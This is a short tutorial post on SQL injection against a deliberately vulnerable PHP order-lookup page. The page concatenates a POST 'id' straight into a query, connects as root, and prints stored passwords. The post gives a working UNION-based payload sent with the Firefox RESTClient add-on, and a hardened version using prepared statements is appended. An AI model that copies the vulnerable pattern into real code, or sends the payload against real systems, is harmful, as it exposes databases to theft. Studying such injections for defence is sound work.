Using the POST method with the Firefox RESTClient add-on
Here is the PHP code:
<html>
<body>
<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
{
    die('Could not connect: ' . mysql_error());
}
else
{
    mysql_select_db("test");
    // The POST parameter is taken as-is, with no validation.
    $id = $_POST['id'];
    // $id is concatenated unquoted into the SQL text: this is the injection point.
    $query ="select * from zhuru where Id=$id";
    $result = mysql_query($query);
    $info= mysql_fetch_array($result);
    $re_num = mysql_num_rows($result);
    if($info==FALSE)
    {
        echo "抱歉,您的訂餐資訊沒有查到!";
    }
    else
    {
        echo "<form action='index.php' method='post' name='chakanform'>";
        echo "<table>";
        echo "<tr>";
        echo "<h3>你的訂餐記錄是:</h3>";
        echo "</tr>";
        echo "<tr>";
        echo "<td>";
        echo "序號:";
        echo "</td>";
        echo "<td>";
        echo "菜品:";
        echo "</td>";
        echo "<td>";
        echo "訂餐時間";
        echo "</td>";
        echo "<td>";
        echo "訂餐時間";
        echo "</td>";
        echo "<td>";
        echo "訂餐時間";
        echo "</td>";
        echo "<td>";
        echo "訂餐時間";
        echo "</td>";
        echo "<td>";
        echo "訂餐時間";
        echo "</td>";
        echo "<td>";
        echo "訂餐時間";
        echo "</td>";
        echo "</tr>";
        $xuhao = 0; // row counter
        do
        {
            $xuhao++;
            echo "<tr>";
            echo "<td>";
            echo $xuhao;
            echo "</td>";
            echo "<td>";
            echo $info['username'];
            echo "</td>";
            echo "<td>";
            echo $info['password'];
            echo "</td>";
            echo "<td>";
            echo $info['id'];
            echo "</td>";
            echo "<td>";
            echo $info['tushu'];
            echo "</td>";
            echo "<td>";
            echo $info['dizhi'];
            echo "</td>";
            echo "</tr>";
        }
        while($info= @mysql_fetch_array($result));
        echo "</table>";
        echo "</form>";
    }
    mysql_close($con);
}
?>
</body>
</html>
Note: add a request header.
Configure it as shown above.
Then change the request body to:
id=1 and 1=2 union select 1,2,3,4,database()
That is all it takes to perform the injection.
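
A hardened form of the lookup above, added here as an example and not part of the original post: `id` is validated as an integer and bound as a query parameter, so the request body shown on this page is rejected with a 400 instead of altering the query. The PDO DSN, the `app_ro` account, the `DB_PASS` environment variable and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Accept only a plain positive integer; anything else (including the
// "1 and 1=2 union select ..." body from the post) yields null.
function parse_order_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The id is bound as a typed parameter, never concatenated into the SQL text.
// Only the columns needed for display are selected (no password column).
function find_orders(PDO $pdo, int $id): array
{
    $stmt = $pdo->prepare('SELECT username, tushu, dizhi FROM zhuru WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Assumed connection settings: a low-privilege account instead of root.
$pdo = new PDO(
    'mysql:host=localhost;dbname=test;charset=utf8mb4',
    'app_ro',
    getenv('DB_PASS') ?: '',
    [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepared statements
    ]
);

$id = parse_order_id($_POST['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid id');
}

echo '<table>';
foreach (find_orders($pdo, $id) as $n => $row) {
    echo '<tr><td>' . ($n + 1) . '</td>';
    foreach ($row as $value) {
        // Encode on output so stored values cannot inject markup.
        echo '<td>' . htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8') . '</td>';
    }
    echo '</tr>';
}
echo '</table>';
```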